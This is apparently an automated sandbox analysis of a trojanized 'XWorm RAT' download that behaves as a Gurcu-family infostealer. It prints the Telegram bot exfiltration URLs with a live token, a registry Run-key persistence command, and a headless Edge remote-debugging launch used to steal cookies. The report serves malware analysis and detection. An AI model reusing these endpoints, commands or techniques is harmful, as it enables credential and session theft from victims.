Analysis
-
max time kernel
198s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2025 03:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Intestio/XWorm-RAT
Resource
win10v2004-20250129-en
General
-
Target
https://github.com/Intestio/XWorm-RAT
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgithub.com%5D%20were%20successfully%20grabbe
Signatures
-
Gurcu family
-
Uses browser remote debugging 2 TTPs 3 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3608 msedge.exe 3696 msedge.exe 5256 msedge.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation Command Reciever.exe Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation conhost.exe -
Executes dropped EXE 2 IoCs
pid Process 2860 Command Reciever.exe 3036 conhost.exe -
Loads dropped DLL 2 IoCs
pid Process 2860 Command Reciever.exe 3036 conhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdate\\conhost.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 118 raw.githubusercontent.com 101 raw.githubusercontent.com 102 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 99 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4248 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm RAT V2.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm RAT V2.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Command Reciever.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Command Reciever.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier conhost.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Command Reciever.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2212 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133833733354510759" chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2211717155-842865201-3404093980-1000\{1199ADDD-5D7D-44BC-9496-3A93D80A5744} msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2980 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4616 chrome.exe 4616 chrome.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 2860 Command Reciever.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 4052 chrome.exe 4052 chrome.exe 4052 chrome.exe 4052 chrome.exe 3036 conhost.exe 3036 conhost.exe 2820 Command Reciever.exe 2820 Command Reciever.exe 2820 Command Reciever.exe 2820 Command Reciever.exe 2820 Command Reciever.exe 2820 Command Reciever.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 3036 conhost.exe 2820 Command Reciever.exe 2820 Command Reciever.exe 2820 Command Reciever.exe 2820 Command Reciever.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2820 Command Reciever.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 4616 chrome.exe 4616 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe Token: SeShutdownPrivilege 4616 chrome.exe Token: SeCreatePagefilePrivilege 4616 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe -
Suspicious use of SendNotifyMessage 25 IoCs
pid Process 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 4616 chrome.exe 2820 Command Reciever.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3036 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4616 wrote to memory of 2460 4616 chrome.exe 84 PID 4616 wrote to memory of 2460 4616 chrome.exe 84 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 1224 4616 chrome.exe 86 PID 4616 wrote to memory of 4280 4616 chrome.exe 87 PID 4616 wrote to memory of 4280 4616 chrome.exe 87 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88 PID 4616 wrote to memory of 2700 4616 chrome.exe 88
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Intestio/XWorm-RAT1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff98776cc40,0x7ff98776cc4c,0x7ff98776cc582⤵PID:2460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1784,i,2612898096368588505,13790342291565557517,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1780 /prefetch:22⤵PID:1224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,2612898096368588505,13790342291565557517,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2172 /prefetch:32⤵PID:4280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,2612898096368588505,13790342291565557517,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=2416 /prefetch:82⤵PID:2700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,2612898096368588505,13790342291565557517,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3136 /prefetch:12⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,2612898096368588505,13790342291565557517,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3316 /prefetch:12⤵PID:4852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4612,i,2612898096368588505,13790342291565557517,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4616 /prefetch:82⤵PID:3460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4624,i,2612898096368588505,13790342291565557517,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5096 /prefetch:82⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5268,i,2612898096368588505,13790342291565557517,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4648 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4052
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4952
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4452
-
C:\Users\Admin\Desktop\XWorm RAT V2.1.exe"C:\Users\Admin\Desktop\XWorm RAT V2.1.exe"1⤵
- System Location Discovery: System Language Discovery
PID:1776
-
C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- System Location Discovery: System Language Discovery
PID:3704 -
C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe"C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
PID:2820
-
-
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4B28.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp4B28.tmp.bat3⤵PID:4012
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:1536
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2860"4⤵
- Enumerates processes with tasklist
PID:4248
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:748
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:2212
-
-
C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3036 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f5⤵PID:3640
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:2980
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --no-sandbox --disable-gpu5⤵
- Uses browser remote debugging
PID:3608 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ff9702646f8,0x7ff970264708,0x7ff9702647186⤵PID:4900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1512,11194465178356350420,6193991171520885420,131072 --disable-features=PaintHolding --no-sandbox --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1496 /prefetch:26⤵
- Modifies registry class
PID:1184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11194465178356350420,6193991171520885420,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --no-sandbox --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1768 /prefetch:36⤵PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1512,11194465178356350420,6193991171520885420,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2036 /prefetch:16⤵
- Uses browser remote debugging
PID:3696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1512,11194465178356350420,6193991171520885420,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2120 /prefetch:16⤵
- Uses browser remote debugging
PID:5256
-
-
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4248
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Modify Authentication Process
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD5da19520bf591e4a89e879a29a0288691
SHA1ac270da0b86d417e560f601c81f946d6fc46a064
SHA25643aa8df16ff2df69f4ef5cf1102d2bc442cf8ec16bdc70427c7e80954a9ac585
SHA512a1d5e103ae95f13405e09ff82e3c7d1002562743168a2854b1a96cd185f2849d0260d2b3e529bc0b6ef61271d46f4eb6078c0047a848a544a909600119fe8ae6
-
Filesize
1KB
MD54b41c5d60c0093ff4fb0116765c73933
SHA114ca22a02059e1b2485062a6bd289cb3c6fcd872
SHA2568a51a1dcac268acacae668b46ab675e5dd16cdb4c08338a840e676989d5fe584
SHA51214698478cae66eab718885cc31e7d2f77879c1504fb1eb42a34f0c67874cc964869bc4203b38867eff4a02e5831fcd95d294db633f473c98550cb6d292ce97a6
-
Filesize
160KB
MD59b7e8adc0652864c1f8002a0a0047f73
SHA1d6a054c3fd17bfee7dc3565d551e0936e91730d5
SHA256f584301d3028549075ba8b25a4c94fba333c0ae3da7020c7129ea66b43d7b36f
SHA51285667fa095d639aeaa7be388831a8cf7490f76cafefcbc16c82fabe7bbb75df64c609dd6a96574452ff2a0724f76ba3fb98cc116412e8f0f288586208752cfcd
-
Filesize
2KB
